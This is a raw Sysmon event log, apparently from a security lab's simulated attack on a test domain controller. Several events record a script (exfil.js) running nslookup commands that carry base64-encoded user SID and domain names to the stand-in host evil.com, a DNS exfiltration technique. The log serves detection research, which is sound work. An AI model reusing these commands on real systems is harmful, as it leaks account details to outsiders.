14:16:40.744{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203071Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.744{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203070Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.744{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203069Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.744{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C8-629A-8441-000000005F02}2556C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203068Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.744{2E1864BB-17C8-629A-8241-000000005F02}35684740C:\Windows\system32\cmd.exe{2E1864BB-17C8-629A-8441-000000005F02}2556C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203067Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.755{2E1864BB-17C8-629A-8441-000000005F02}2556C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAz evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C8-629A-8241-000000005F02}3568C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcbaab.tmp 2>&1 10341000x8000000000000000203066Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.722{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C8-629A-8341-000000005F02}2384C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203065Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.722{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C8-629A-8341-000000005F02}2384C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000203064Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.286{00000000-0000-0000-0000-000000000000}2060<unknown process>-udpfalsefalse127.0.0.1-52946-false127.0.0.1-53domain 10341000x8000000000000000203063Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.707{2E1864BB-17C8-629A-8341-000000005F02}23844364C:\Windows\system32\conhost.exe{2E1864BB-17C8-629A-8241-000000005F02}3568C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203062Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.691{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C8-629A-8341-000000005F02}2384C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203061Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.691{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203060Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.691{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203059Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.691{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203058Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.691{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203057Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.691{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C8-629A-8241-000000005F02}3568C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203056Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.691{2E1864BB-17A1-629A-783D-000000005F02}55525924C:\Windows\System32\WScript.exe{2E1864BB-17C8-629A-8241-000000005F02}3568C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203055Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.691{2E1864BB-17C8-629A-8241-000000005F02}3568C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcbaab.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000203054Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.676{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nljqr.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000203053Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.644{2E1864BB-17C8-629A-8041-000000005F02}24046016C:\Windows\system32\conhost.exe{2E1864BB-17C8-629A-8141-000000005F02}7764C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203052Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.644{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203051Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.644{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203050Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.644{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203049Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.644{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203048Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.644{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C8-629A-8141-000000005F02}7764C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203047Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.644{2E1864BB-17C8-629A-7F41-000000005F02}6604984C:\Windows\system32\cmd.exe{2E1864BB-17C8-629A-8141-000000005F02}7764C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203046Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.651{2E1864BB-17C8-629A-8141-000000005F02}7764C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C8-629A-7F41-000000005F02}6604C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljqr.tmp 2>&1 10341000x8000000000000000203045Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.622{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C8-629A-8041-000000005F02}2404C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203044Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.622{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C8-629A-8041-000000005F02}2404C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203043Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.622{2E1864BB-17C8-629A-8041-000000005F02}24046016C:\Windows\system32\conhost.exe{2E1864BB-17C8-629A-7F41-000000005F02}6604C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203042Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.607{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C8-629A-8041-000000005F02}2404C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203041Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.607{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203040Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 